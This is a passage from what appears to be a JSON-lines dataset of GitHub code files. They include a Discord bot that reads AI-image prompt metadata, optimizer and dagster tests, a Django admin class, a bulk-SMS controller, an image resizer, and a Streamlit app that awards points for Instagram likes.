PIL import Image\nfrom collections import OrderedDict\n\nload_dotenv()\nCONFIG = toml.load('config.toml')\nMONITORED_CHANNEL_IDS = CONFIG.get('MONITORED_CHANNEL_IDS', [])\nSCAN_LIMIT_BYTES = CONFIG.get('SCAN_LIMIT_BYTES', 10 * 1024**2) # Default 10 MB\n\nintents = Intents.default() | Intents.message_content | Intents.members\nclient = commands.Bot(intents=intents)\n\n\ndef get_params_from_string(param_str):\n output_dict = {}\n parts = param_str.split('Steps: ')\n prompts = parts[0]\n params = 'Steps: ' + parts[1]\n if 'Negative prompt: ' in prompts:\n output_dict['Prompt'] = prompts.split('Negative prompt: ')[0]\n output_dict['Negative Prompt'] = prompts.split('Negative prompt: ')[1]\n if len(output_dict['Negative Prompt']) > 1000:\n output_dict['Negative Prompt'] = output_dict['Negative Prompt'][:1000] + '...'\n else:\n output_dict['Prompt'] = prompts\n if len(output_dict['Prompt']) > 1000:\n output_dict['Prompt'] = output_dict['Prompt'][:1000] + '...'\n params = params.split(', ')\n for param in params:\n try:\n key, value = param.split(': ')\n output_dict[key] = value\n except ValueError:\n pass\n return output_dict\n\n\ndef get_embed(embed_dict, context: Message):\n embed = Embed(color=context.author.color)\n for key, value in embed_dict.items():\n embed.add_field(name=key, value=value, inline='Prompt' not in key)\n embed.set_footer(text=f'Posted by {context.author}', icon_url=context.author.display_avatar)\n return embed\n\n\ndef read_info_from_image_stealth(image):\n # trying to read stealth pnginfo\n width, height = image.size\n pixels = image.load()\n\n has_alpha = True if image.mode == 'RGBA' else False\n mode = None\n compressed = False\n binary_data = ''\n buffer_a = ''\n buffer_rgb = ''\n index_a = 0\n index_rgb = 0\n sig_confirmed = False\n confirming_signature = True\n reading_param_len = False\n reading_param = False\n read_end = False\n for x in range(width):\n for y in range(height):\n if has_alpha:\n r, g, b, a = pixels[x, y]\n buffer_a += str(a & 1)\n index_a += 1\n else:\n r, g, b = pixels[x, y]\n buffer_rgb += str(r & 1)\n buffer_rgb += str(g & 1)\n buffer_rgb += str(b & 1)\n index_rgb += 3\n if confirming_signature:\n if index_a == len('stealth_pnginfo') * 8:\n decoded_sig = bytearray(int(buffer_a[i:i + 8], 2) for i in\n range(0, len(buffer_a), 8)).decode('utf-8', errors='ignore')\n if decoded_sig in {'stealth_pnginfo', 'stealth_pngcomp'}:\n confirming_signature = False\n sig_confirmed = True\n reading_param_len = True\n mode = 'alpha'\n if decoded_sig == 'stealth_pngcomp':\n compressed = True\n buffer_a = ''\n index_a = 0\n else:\n read_end = True\n break\n elif index_rgb == len('stealth_pnginfo') * 8:\n decoded_sig = bytearray(int(buffer_rgb[i:i + 8], 2) for i in\n range(0, len(buffer_rgb), 8)).decode('utf-8', errors='ignore')\n if decoded_sig in {'stealth_rgbinfo', 'stealth_rgbcomp'}:\n confirming_signature = False\n sig_confirmed = True\n reading_param_len = True\n mode = 'rgb'\n if decoded_sig == 'stealth_rgbcomp':\n compressed = True\n buffer_rgb = ''\n index_rgb = 0\n elif reading_param_len:\n if mode == 'alpha':\n if index_a == 32:\n param_len = int(buffer_a, 2)\n reading_param_len = False\n reading_param = True\n buffer_a = ''\n index_a = 0\n else:\n if index_rgb == 33:\n pop = buffer_rgb[-1]\n buffer_rgb = buffer_rgb[:-1]\n param_len = int(buffer_rgb, 2)\n reading_param_len = False\n reading_param = True\n buffer_rgb = pop\n index_rgb = 1\n elif reading_param:\n if mode == 'alpha':\n if index_a == param_len:\n binary_data = buffer_a\n read_end = True\n break\n else:\n if index_rgb >= param_len:\n diff = param_len - index_rgb\n if diff < 0:\n buffer_rgb = buffer_rgb[:diff]\n binary_data = buffer_rgb\n read_end = True\n break\n else:\n # impossible\n read_end = True\n break\n if read_end:\n break\n if sig_confirmed and binary_data != '':\n # Convert binary string to UTF-8 encoded text\n byte_data = bytearray(int(binary_data[i:i + 8], 2) for i in range(0, len(binary_data), 8))\n try:\n if compressed:\n decoded_data = gzip.decompress(bytes(byte_data)).decode('utf-8')\n else:\n decoded_data = byte_data.decode('utf-8', errors='ignore')\n return decoded_data\n except:\n pass\n return None\n\n\n@client.event\nasync def on_ready():\n print(f\"Logged in as {client.user}!\")\n\n\n@client.event\nasync def on_message(message: Message):\n if message.channel.id in MONITORED_CHANNEL_IDS and message.attachments:\n attachments = [a for a in message.attachments if a.filename.lower().endswith(\".png\") and a.size < SCAN_LIMIT_BYTES]\n for i, attachment in enumerate(attachments): # download one at a time as usually the first image is already ai-generated\n metadata = OrderedDict()\n await read_attachment_metadata(i, attachment, metadata)\n if metadata:\n await message.add_reaction('🔎')\n return\n\n\nclass MyView(View):\n def __init__(self):\n super().__init__(timeout=3600, disable_on_timeout=True)\n self.metadata = None\n\n @button(label='Full Parameters', style=ButtonStyle.green)\n async def details(self, button, interaction):\n button.disabled = True\n await interaction.response.edit_message(view=self)\n if len(self.metadata) > 1980:\n with io.StringIO() as f:\n f.write(self.metadata)\n f.seek(0)\n await interaction.followup.send(file=File(f, \"parameters.yaml\"))\n else:\n await interaction.followup.send(f\"```yaml\\n{self.metadata}```\")\n\n\nasync def read_attachment_metadata(i: int, attachment: Attachment, metadata: OrderedDict):\n \"\"\"Allows downloading in bulk\"\"\"\n try:\n image_data = await attachment.read()\n with Image.open(io.BytesIO(image_data)) as img:\n # try:\n # info = img.info['parameters']\n # except:\n # info = read_info_from_image_stealth(img)\n\n if img.info:\n if 'parameters' in img.info:\n info = img.info['parameters']\n elif 'prompt' in img.info:\n info = img.info['prompt']\n elif img.info['Software'] == 'NovelAI':\n info = img.info[\"Description\"] + img.info[\"Comment\"]\n else:\n info = read_info_from_image_stealth(img)\n \n if info:\n metadata[i] = info\n except Exception as error:\n print(f\"{type(error).__name__}: {error}\")\n\n\n@client.event\nasync def on_raw_reaction_add(ctx: RawReactionActionEvent):\n \"\"\"Send image metadata in reacted post to user DMs\"\"\"\n if ctx.emoji.name != '🔎' or ctx.channel_id not in MONITORED_CHANNEL_IDS or ctx.member.bot:\n return\n channel = client.get_channel(ctx.channel_id)\n message = await channel.fetch_message(ctx.message_id)\n if not message:\n return\n attachments = [a for a in message.attachments if a.filename.lower().endswith(\".png\")]\n if not attachments:\n return\n metadata = OrderedDict()\n tasks = [read_attachment_metadata(i, attachment, metadata) for i, attachment in enumerate(attachments)]\n await asyncio.gather(*tasks)\n if not metadata:\n return\n user_dm = await client.get_user(ctx.user_id).create_dm()\n for attachment, data in [(attachments[i], data) for i, data in metadata.items()]:\n try:\n\n if 'Steps:' in data:\n params = get_params_from_string(data)\n embed = get_embed(params, message)\n embed.set_image(url=attachment.url)\n custom_view = MyView()\n custom_view.metadata = data\n await user_dm.send(view=custom_view, embed=embed, mention_author=False)\n else :\n img_type = \"ComfyUI\" if \"\\\"inputs\\\"\" in data else \"NovelAI\"\n embed = Embed(title=img_type+\" Parameters\", color=message.author.color)\n embed.set_footer(text=f'Posted by {message.author}', icon_url=message.author.display_avatar)\n embed.set_image(url=attachment.url)\n await user_dm.send(embed=embed, mention_author=False)\n with io.StringIO() as f:\n f.write(data)\n f.seek(0)\n await user_dm.send(file=File(f, \"parameters.yaml\"))\n \n except:\n pass\n\n\n@client.message_command(name=\"View Parameters\")\nasync def message_command(ctx: ApplicationContext, message: Message):\n \"\"\"Get raw list of parameters for every image in this post.\"\"\"\n attachments = [a for a in message.attachments if a.filename.lower().endswith(\".png\")]\n if not attachments:\n await ctx.respond(\"This post contains no matching images.\", ephemeral=True)\n return\n await ctx.defer(ephemeral=True)\n metadata = OrderedDict()\n tasks = [read_attachment_metadata(i, attachment, metadata) for i, attachment in enumerate(attachments)]\n await asyncio.gather(*tasks)\n if not metadata:\n await ctx.respond(f\"This post contains no image generation data.\\n{message.author.mention} needs to install [this extension](<https://github.com/ashen-sensored/sd_webui_stealth_pnginfo>).\", ephemeral=True)\n return\n response = \"\\n\\n\".join(metadata.values())\n if len(response) < 1980:\n await ctx.respond(f\"```yaml\\n{response}```\", ephemeral=True)\n else:\n with io.StringIO() as f:\n f.write(response)\n f.seek(0)\n await ctx.respond(file=File(f, \"parameters.yaml\"), ephemeral=True)\n\n\nclient.run(os.environ[\"BOT_TOKEN\"])\n","repo_name":"sALTaccount/PromptInspectorBot","sub_path":"PromptInspector.py","file_name":"PromptInspector.py","file_ext":"py","file_size_in_byte":11409,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"19766132085","text":"import time\nimport numpy as np\nfrom sklearn.datasets import load_breast_cancer\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.tree import DecisionTreeClassifier\n\nfrom hyperactive import Hyperactive\nfrom hyperactive.optimizers import (\n RandomSearchOptimizer,\n HillClimbingOptimizer,\n)\n\n\ndef objective_function(para):\n score = -para[\"x1\"] * para[\"x1\"]\n return score\n\n\nsearch_space = {\n \"x1\": list(np.arange(0, 100000, 0.1)),\n}\n\n\ndef test_max_score_0():\n def objective_function(para):\n score = -para[\"x1\"] * para[\"x1\"]\n return score\n\n search_space = {\n \"x1\": list(np.arange(0, 100, 0.1)),\n }\n\n max_score = -9999\n\n opt = HillClimbingOptimizer(\n epsilon=0.01,\n rand_rest_p=0,\n )\n\n hyper = Hyperactive()\n hyper.add_search(\n objective_function,\n search_space,\n optimizer=opt,\n n_iter=100000,\n initialize={\"warm_start\": [{\"x1\": 99}]},\n max_score=max_score,\n )\n hyper.run()\n\n print(\"\\n Results head \\n\", hyper.search_data(objective_function).head())\n print(\"\\n Results tail \\n\", hyper.search_data(objective_function).tail())\n\n print(\"\\nN iter:\", len(hyper.search_data(objective_function)))\n\n assert -100 > hyper.best_score(objective_function) > max_score\n\n\ndef test_max_score_1():\n def objective_function(para):\n score = -para[\"x1\"] * para[\"x1\"]\n time.sleep(0.01)\n return score\n\n search_space = {\n \"x1\": list(np.arange(0, 100, 0.1)),\n }\n\n max_score = -9999\n\n c_time = time.perf_counter()\n hyper = Hyperactive()\n hyper.add_search(\n objective_function,\n search_space,\n n_iter=100000,\n initialize={\"warm_start\": [{\"x1\": 99}]},\n max_score=max_score,\n )\n hyper.run()\n diff_time = time.perf_counter() - c_time\n\n print(\"\\n Results head \\n\", hyper.search_data(objective_function).head())\n print(\"\\n Results tail \\n\", hyper.search_data(objective_function).tail())\n\n print(\"\\nN iter:\", len(hyper.search_data(objective_function)))\n\n assert diff_time < 1\n","repo_name":"SimonBlanke/Hyperactive","sub_path":"tests/test_max_score.py","file_name":"test_max_score.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","stars":473,"dataset":"github-code","pt":"53"} +{"seq_id":"914179059","text":"from __future__ import unicode_literals\n\nfrom django.contrib import admin\n\nfrom admin_page_lock.models.database_model import DatabasePageLockModel\n\n\nclass DatabasePageLockModelAdmin(admin.ModelAdmin):\n fields = (\n \"active\",\n \"user_reference\",\n \"locked\",\n \"url\",\n \"url_parameters\",\n \"tab_counter\",\n )\n list_display = (\n \"url\",\n \"url_parameters\",\n \"active\",\n \"user_reference\",\n \"locked\",\n \"formated_locked_at\",\n \"formated_locked_out\",\n \"tab_counter\",\n )\n list_filter = (\n \"active\",\n \"user_reference\",\n )\n list_per_page = 20\n ordering = (\"-locked_at\",)\n\n def _get_formated_datetime(self, lock_datetime):\n return lock_datetime.strftime(\"%Y-%m-%d-%H-%M-%S\")\n\n def formated_locked_at(self, obj):\n return self._get_formated_datetime(obj.locked_at)\n\n formated_locked_at.admin_order_field = \"locked_at\"\n formated_locked_at.allow_tags = True\n formated_locked_at.short_description = DatabasePageLockModel._meta.get_field(\n \"locked_at\"\n ).verbose_name # noqa: E501\n\n def formated_locked_out(self, obj):\n return self._get_formated_datetime(obj.locked_out)\n\n formated_locked_out.admin_order_field = \"locked_at\"\n formated_locked_out.allow_tags = True\n formated_locked_out.short_description = DatabasePageLockModel._meta.get_field(\n \"locked_out\"\n ).verbose_name # noqa: E501\n\n\nadmin.site.register(DatabasePageLockModel, DatabasePageLockModelAdmin)\n","repo_name":"Showmax/django-admin-page-lock","sub_path":"admin_page_lock/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"53"} +{"seq_id":"10804692986","text":"'''\nStructuring your project effectively is essential for organization, maintainability, and scalability. While the specific structure may vary depending on your project's size and complexity, here's a general guide to help you structure your project:\n\n1. Root Directory:\n - README.md: Document your project, its purpose, and any instructions or notes for other developers or visitors.\n - index.html: The main HTML file that serves as the entry point for your website.\n - styles: Directory for your CSS or SCSS files.\n - scripts: Directory for your JavaScript files.\n - images: Directory to store images used in your project.\n - assets: Directory for other static assets like fonts, icons, or external libraries.\n - .gitignore: Specify files or directories that should be ignored by Git when committing changes.\n\n2. Styles:\n - main.css: The main CSS file where you can define global styles.\n - components: Directory to store CSS files specific to individual components or sections.\n - utilities: Directory for utility classes or helper CSS files (e.g., for spacing, typography, colors).\n - responsive.css: CSS file for handling responsive styles or media queries.\n - _variables.scss (if using SASS): File to define variables for colors, font sizes, etc.\n\n3. Scripts:\n - main.js: The main JavaScript file where you can define global scripts.\n - components: Directory to store JavaScript files specific to individual components or sections.\n - utilities: Directory for utility scripts or helper functions.\n - vendors: Directory to store third-party libraries or scripts.\n\n4. Images:\n - hero.jpg, logo.png, etc.: Store images used in your project.\n\n5. Assets:\n - fonts: Directory to store custom fonts.\n - icons: Directory for icon files.\n - libraries: Directory to store any external libraries or frameworks used in your project.\n\n6. Additional directories:\n - pages: If your website has multiple pages, create a directory for each page with their respective HTML, CSS, and JavaScript files.\n - data: If your website requires data storage or JSON files, create a directory for data-related files.\n\n7. Build tools (if applicable):\n - If you're using build tools like webpack, Gulp, or npm scripts, you can create additional directories or files specific to your chosen build tool.\n\nRemember that this is a general structure, and you can adapt it to your specific project needs. If you're using a specific framework or tool, it might have its own recommended project structure that you can follow.\n\nMaintaining a clean and well-organized project structure will help you navigate your codebase easily, collaborate with others, and ensure scalability as your project grows.\n\n\n'''\n\nimport os\n\n\ndef create_directory(path):\n if not os.path.exists(path):\n os.makedirs(path)\n\n\ndef create_file(path):\n if not os.path.exists(path):\n with open(path, 'w'):\n pass\n\n\ndef create_project_structure():\n root_dir = os.getcwd() # Set the current working directory as the root directory\n\n # Top-level directories\n directories = [\n 'assets/fonts',\n 'assets/icons',\n 'assets/libraries',\n 'data',\n 'images',\n 'pages',\n 'scripts/components',\n 'scripts/utilities',\n 'scripts/vendors',\n 'styles/components',\n 'styles/utilities'\n ]\n\n for directory in directories:\n create_directory(os.path.join(root_dir, directory))\n\n # Create individual files\n files = [\n '.gitignore',\n 'README.md',\n 'index.html',\n 'scripts/main.js',\n 'styles/main.css',\n 'assets/fonts/README.md',\n 'assets/icons/README.md',\n 'assets/libraries/README.md',\n 'data/README.md',\n 'images/README.md',\n 'pages/README.md',\n 'scripts/components/README.md',\n 'scripts/utilities/README.md',\n 'scripts/vendors/README.md',\n 'styles/components/README.md',\n 'styles/utilities/README.md'\n ]\n\n for file in files:\n create_file(os.path.join(root_dir, file))\n\n print(\"Project structure created successfully.\")\n\n\n# Run the script to create the project structure\ncreate_project_structure()\n","repo_name":"wwmogu/wwmogu.github.io","sub_path":"scripts/utilities/init_structure.py","file_name":"init_structure.py","file_ext":"py","file_size_in_byte":4219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39457400206","text":"# coding: utf8\n# try something like\n@auth.requires_login()\ndef index(): \n return dict()\n\ndef send_sms():\n if auth.user.access_token and auth.user.app_id:\n numbers = \"\"\n groups=\"\"\n total_reciver=0\n for group in request.post_vars.groups.split(','):\n db_group = db(db.contact_group.user_uid == auth.user.id)(db.contact_group.name == group).select().first()\n if db_group:\n phone_numbers = db_group.contact.select(db.contact.phone_number)\n numbers += ','.join([phone.phone_number for phone in phone_numbers])\n groups += db_group.name +',' \n total_reciver +=1\n if request.post_vars.campaign_name and groups:\n groups = groups[:-1]\n campaign_id = db.campaign.insert(name=request.post_vars.campaign_name,\n groups=groups,\n msg = request.post_vars.message,\n total_reciver = total_reciver or 0)\n import urllib\n from google.appengine.api import urlfetch\n params = {'app_id': auth.user.app_id,\n 'access_token': auth.user.access_token,\n 'dest':numbers,\n 'msg':request.post_vars.message,\n 'tag':campaign_id or '',\n 'notify_url':\"http://hoiiosmschimp.appspot.com/sms_chimp/post_back/sms_post_back\"\n }\n data = urllib.urlencode(params)\n result = urlfetch.fetch(url=\"https://secure.hoiio.com/open/sms/bulk_send\",\n payload=data,\n method=urlfetch.POST,\n headers={'Content-Type': 'application/x-www-form-urlencoded'})\n \n from gluon.contrib import simplejson as json\n \n response = json.loads(result.content) \n if response['status'] == \"success_ok\":\n session.flash = \"You message's sent successful\"\n else :\n session.flash = \"Have error (%s) please try again \" % response['status']\n else:\n session.flash = \"You have to configuration app id and access token before sending sms\"\n redirect(URL('index'))\n\n\ndef group_selector():\n if not request.vars.query: \n return ''\n query = request.vars.query\n groups = db(db.contact_group.user_uid == auth.user.id).select(db.contact_group.name).find(lambda row:row.name.startswith(query)) \n \n return DIV(*[DIV(groups.name,\n _onclick=\"add_new_group('%s')\" % groups.name,\n _class=\"group_selector\") for groups in groups])\n","repo_name":"hunterbmt/smschimp","sub_path":"applications/sms_chimp/controllers/sms.py","file_name":"sms.py","file_ext":"py","file_size_in_byte":2681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9176648491","text":"import sys\nfrom PIL import Image\nimport os\n\n# USAGE: \n# arg 1: path where to save the images\n# args 2-n: images to optimize\ndef main():\n images = sys.argv[2]\n path = sys.argv[1]\n print(sys.argv)\n for x in range(2,len(sys.argv)):\n imgsrc = sys.argv[x]\n imgext,imgname = imgsrc[::-1].split(\".\",1)\n imgname = (imgname.split(\"/\",1)[0])[::-1]\n imgext = imgext[::-1]\n basewidths = [512,192,64,48]\n img = Image.open(imgsrc)\n for x in range(0,len(basewidths)):\n wpercent = (basewidths[x]/float(img.size[0]))\n hsize = int((float(img.size[1])*float(wpercent)))\n new_img = img.resize((basewidths[x],hsize), Image.ANTIALIAS)\n new_name = imgname + '_' + str(basewidths[x]) + '.' + imgext\n if imgext == \"jpg\":\n new_img.save(path + new_name,quality=40)\n else:\n new_img.save(path + new_name)\nmain()\n","repo_name":"arellanoelden/create_pwa","sub_path":"optimize_images.py","file_name":"optimize_images.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19315812698","text":"import streamlit as st\r\nimport numpy as np\r\nimport pandas as pd\r\nimport instaloader\r\nimport schedule\r\nfrom time import sleep\r\nfrom datetime import datetime,date\r\nfrom datetime import timedelta\r\nimport os\r\n\r\nfrom dotenv import load_dotenv\r\nload_dotenv()\r\n\r\n\r\n###################################ここからグローバル変数宣言############################\r\n\r\n\r\n#ログテーブル配列変数宣言\r\nYuserName = []\r\nGrantPoint = []\r\nLikeAcount = []\r\nTimestamp = []\r\nif 'YuserName' not in st.session_state:\r\n st.session_state[\"YuserName\"] = []\r\n\r\nif 'GrantPoint' not in st.session_state:\r\n st.session_state[\"GrantPoint\"] = []\r\n\r\nif 'TotalPoint' not in st.session_state:\r\n st.session_state[\"TotalPoint\"] = []\r\n\r\nif 'LikeAcount' not in st.session_state:\r\n st.session_state[\"LikeAcount\"] = []\r\n\r\nif 'PostContent' not in st.session_state:\r\n st.session_state[\"PostContent\"] = []\r\n\r\nif 'Timestamp' not in st.session_state:\r\n st.session_state[\"Timestamp\"] = []\r\n\r\n#ユーザー記録変数\r\nif 'UserMemory' not in st.session_state:\r\n st.session_state[\"UserMemory\"] = []\r\n\r\n#ユーザーポイント数記録変数\r\nif 'UserPoint' not in st.session_state:\r\n st.session_state[\"UserPoint\"] = []\r\n\r\n#付与ポイント係数\r\nLIKEPOINT = 1\r\nSEARPOINT = 3\r\n\r\n#企業投稿配列\r\nPushGrant = []\r\n#前日分\r\nif 'PushGrantAgo' not in st.session_state:\r\n st.session_state[\"PushGrantAgo\"] = 0\r\n\r\n#追加投稿件数\r\naddcount = 0 \r\n\r\n#フォロワー保存\r\nFollowerUser = []\r\n\r\n#いいねしたアカウント保存定義\r\nLikeUser = []\r\n\r\n#インスタ企業取得データ\r\nprofile = \"\"\r\nposts = \"\"\r\n\r\n#IDとpasswordを定義\r\nINSTAGRAM_ID = os.getenv('INSTAGRAM_ID')\r\nINSTAGRAM_PASSWORD = os.getenv('INSTAGRAM_PASSWORD')\r\nid = \"kamomebot11\"\r\n\r\n#企業投稿カウント変数(常時監視変数)宣言\r\nGrantCountTest = 0\r\nMaxCountTest = 0\r\nif 'MaxCountTest' not in st.session_state:\r\n st.session_state[\"MaxCountTest\"] = 0\r\n\r\n# 現在時間の取得\r\nnowtime = []\r\n# 何時まで実行するか定義\r\nsetlimit = []\r\n\r\n###################################ここから処理実行############################\r\n\r\n#Instagramにログインする(初期設定)\r\nif 'insta' not in st.session_state:\r\n st.session_state[\"insta\"] = 0\r\n loader = instaloader.Instaloader()\r\n #loader.login(INSTAGRAM_ID, INSTAGRAM_PASSWORD)\r\n profile = instaloader.Profile.from_username(loader.context, id)\r\n posts = profile.get_posts()\r\n GrantCountset = posts.count\r\n st.session_state[\"MaxCountTest\"] = GrantCountset\r\n st.write(st.session_state[\"MaxCountTest\"])\r\n\r\n\r\n#00初期設定関数(メイン)\r\ndef stertf():\r\n global MaxCountTest\r\n profile = instaloader.Profile.from_username(loader.context, id)\r\n posts = profile.get_posts()\r\n GrantCountset = posts.count\r\n MaxCountTest = GrantCountset\r\n st.write(GrantCountset)\r\n \r\n #i = iter(posts)\r\n #post = next(i)\r\n #post = next(i)\r\n #for user in post.get_likes():\r\n # st.write(user.username)\r\n \r\n #02 スケジュール登録\r\n schedule.every().days.at(\"00:00\").do(task)\r\n\r\n\r\n#投稿数の取得\r\ndef Grantcount():\r\n global posts\r\n global profile\r\n loader = instaloader.Instaloader()\r\n #loader.login(INSTAGRAM_ID, INSTAGRAM_PASSWORD)\r\n profile = instaloader.Profile.from_username(loader.context, id)\r\n posts = profile.get_posts()\r\n GrantCountset = posts.count\r\n return GrantCountset\r\n \r\n\r\n#企業が投稿したか監視関数\r\ndef Grantcheck(GrantCount):\r\n if st.session_state[\"MaxCountTest\"] < GrantCount:\r\n #differenceは差分\r\n difference = GrantCount - st.session_state[\"MaxCountTest\"]\r\n st.session_state[\"MaxCountTest\"] = GrantCount\r\n return difference\r\n else:\r\n return 0\r\n\r\n\r\n#フォロワーの監視関数\r\ndef Getfollowers():\r\n global FollowerUser\r\n global profile\r\n for user in profile.get_followers():\r\n FollowerUser.append(user.username)\r\n #st.write(FollowerUser)\r\n\r\n\r\n#01 定期実行する関数を準備(メイン)\r\ndef task():\r\n #タスク1投稿監視\r\n GrantCount = Grantcount()\r\n #タスク2フォロワー監視\r\n Getfollowers()\r\n #投稿が追加されてたら実行\r\n pushcount = Grantcheck(GrantCount)\r\n getlikeuser(pushcount)\r\n if pushcount != 0:\r\n #st.write(\"投稿\")\r\n #st.write(st.session_state[\"MaxCountTest\"])\r\n settime(pushcount)\r\n\r\n\r\n#ライク取得期間タイマーセット\r\ndef settime(pushcount):\r\n global addcount\r\n global posts\r\n #posts = profile.get_posts()\r\n addcount = posts.count\r\n\r\n\r\n#いいねしたユーザー取得関数\r\ndef getlikeuser(pushcount):\r\n global LikeUser\r\n global posts\r\n global id\r\n i = iter(posts)\r\n turn = st.session_state[\"PushGrantAgo\"] + pushcount\r\n for push in range(turn):\r\n post = next(i)\r\n for user in post.get_likes():\r\n LikeUser.append(user.username)\r\n for follower in FollowerUser:\r\n if follower == user.username and doubleblock(post):\r\n st.session_state[\"YuserName\"].append(user.username)\r\n st.session_state[\"GrantPoint\"].append(pointapp(1))\r\n st.session_state[\"TotalPoint\"].append(pointcalculation(pointapp(1),user.username))\r\n st.session_state[\"LikeAcount\"].append(id)\r\n st.session_state[\"PostContent\"].append(post)\r\n st.session_state[\"Timestamp\"].append(datetime.now())\r\n #st.write(user.username)\r\n #st.write(post)\r\n st.session_state[\"PushGrantAgo\"] = pushcount\r\n #st.write(LikeUser)\r\n\r\n\r\n#ポイントのダブル取得防止関数\r\ndef doubleblock(post):\r\n for PostContent in st.session_state[\"PostContent\"]:\r\n if PostContent == post:\r\n return False\r\n return True\r\n \r\n\r\n#ポイント加算関数\r\ndef pointapp(mode):\r\n if mode == 1:\r\n return LIKEPOINT\r\n if mode == 2:\r\n return SEARPOINT\r\n\r\n\r\n#合ポイント数計算関数\r\ndef pointcalculation(additionpoint,username):\r\n indexcount = 0\r\n st.write(username)\r\n for user in st.session_state[\"UserMemory\"]:\r\n if user == username:\r\n st.session_state[\"UserPoint\"][indexcount] = st.session_state[\"UserPoint\"][indexcount] + additionpoint\r\n st.write(st.session_state[\"UserPoint\"][indexcount])\r\n return st.session_state[\"UserPoint\"][indexcount]\r\n indexcount = indexcount + 1\r\n st.write(st.session_state[\"UserMemory\"])\r\n st.session_state[\"UserPoint\"].append(additionpoint)\r\n st.session_state[\"UserMemory\"].append(username) \r\n return additionpoint\r\n \r\n\r\n\r\ndef test():\r\n st.session_state[\"insta\"] += 1\r\n task()\r\n\r\n\r\n#03 イベント定時実行\r\n#while True:\r\n# schedule.run_pending()\r\n# sleep(1)\r\n\r\n############################ここからフロント記述#######################\r\nst.title(\"Tips\")\r\n\r\nst.write(\"SNS投稿を広告以上の拡散力へ\")\r\n \r\nif st.button(\"0時になったよ!\"):\r\n test()\r\n\r\nst.write(\"ログテーブル\")\r\ndf = pd.DataFrame({\r\n 'ユーザー名':st.session_state[\"YuserName\"],\r\n '付与ポイント数':st.session_state[\"GrantPoint\"],\r\n '総合ポイント数':st.session_state[\"TotalPoint\"],\r\n 'like先アカウント':st.session_state[\"LikeAcount\"],\r\n '投稿ID':st.session_state[\"PostContent\"],\r\n 'タイムスタンプ':st.session_state[\"Timestamp\"]\r\n})\r\nst.write(\"\", df)","repo_name":"kamome-829/instalotest","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7417,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"9891142037","text":"import tempfile\nfrom contextlib import contextmanager\n\nimport mock\nimport pytest\nfrom dagster._core.storage.legacy_storage import LegacyScheduleStorage\nfrom dagster._core.storage.schedules import SqliteScheduleStorage\nfrom dagster._core.storage.sqlite_storage import DagsterSqliteStorage\nfrom dagster._utils.test.schedule_storage import TestScheduleStorage\n\n\n@contextmanager\ndef create_sqlite_schedule_storage():\n with tempfile.TemporaryDirectory() as tempdir:\n yield SqliteScheduleStorage.from_local(tempdir)\n\n\n@contextmanager\ndef create_legacy_schedule_storage():\n with tempfile.TemporaryDirectory() as tempdir:\n # first create the unified storage class\n storage = DagsterSqliteStorage.from_local(tempdir)\n # next create the legacy adapter class\n legacy_storage = LegacyScheduleStorage(storage)\n try:\n yield legacy_storage\n finally:\n legacy_storage.dispose()\n storage.dispose()\n\n\nclass TestSqliteScheduleStorage(TestScheduleStorage):\n __test__ = True\n\n @pytest.fixture(name=\"storage\", params=[create_sqlite_schedule_storage])\n def schedule_storage(self, request):\n with request.param() as s:\n yield s\n\n def test_bucket_gating(self, storage):\n with mock.patch(\n \"dagster._core.storage.schedules.sqlite.sqlite_schedule_storage.get_sqlite_version\",\n return_value=\"3.7.17\",\n ):\n assert not storage.supports_batch_queries\n\n with mock.patch(\n \"dagster._core.storage.schedules.sqlite.sqlite_schedule_storage.get_sqlite_version\",\n return_value=\"3.25.1\",\n ):\n assert storage.supports_batch_queries\n\n with mock.patch(\n \"dagster._core.storage.schedules.sqlite.sqlite_schedule_storage.get_sqlite_version\",\n return_value=\"3.25.19\",\n ):\n assert storage.supports_batch_queries\n\n\nclass TestLegacyStorage(TestScheduleStorage):\n __test__ = True\n\n @pytest.fixture(name=\"storage\", params=[create_legacy_schedule_storage])\n def schedule_storage(self, request):\n with request.param() as s:\n yield s\n","repo_name":"dagster-io/dagster","sub_path":"python_modules/dagster/dagster_tests/storage_tests/test_schedule_storage.py","file_name":"test_schedule_storage.py","file_ext":"py","file_size_in_byte":2165,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"16717264557","text":"import pickle\r\nfrom anime_class import anime_details\r\n\r\nif __name__ == '__main__':\r\n\twith open(\"DB.file\", \"rb\") as f:\r\n\t\tdump = pickle.load(f)\r\n\r\n\tfor anime in dump:\r\n\t\tprint(anime.rank)\r\n\t\tprint(anime.name)","repo_name":"jatinkarthik-tripathy/MAL-Crawler","sub_path":"pickle test.py","file_name":"pickle test.py","file_ext":"py","file_size_in_byte":207,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"29347984707","text":"\"\"\"Módulo para plotagem de gráficos\r\nFATEC - MC - Autor: MCSilva - 03/11/2018 - Versão: 0.0.1\r\n\"\"\"\r\n\r\nimport pygal\r\nimport copy\r\n\r\n\r\ndef gerar_graficoXY(resultado):\r\n \"\"\"Função para plotar gráfico do tipo XY\r\n \r\n Arguments:\r\n resultado {dict} -- dicionário com a seguinte listas: ['restricoes', 'lista_completa_pares_ordenados', 'pares_ord_validos', 'lista_func_vertices_validos', 'funcao_objetivo']\r\n\r\n Returns:\r\n xy_chart.render_data_uri() -- grafico para ser renderizado pelo flask\r\n \"\"\"\r\n problema_de = {'max': 'MAXIMIZAÇÃO', 'min': 'MINIMIZAÇÃO'}\r\n fObjetivo = resultado.get('funcao_objetivo')\r\n restricoes = resultado.get('restricoes')\r\n\r\n # Cria uma estância do gráfico do tipo XY\r\n xy_chart = 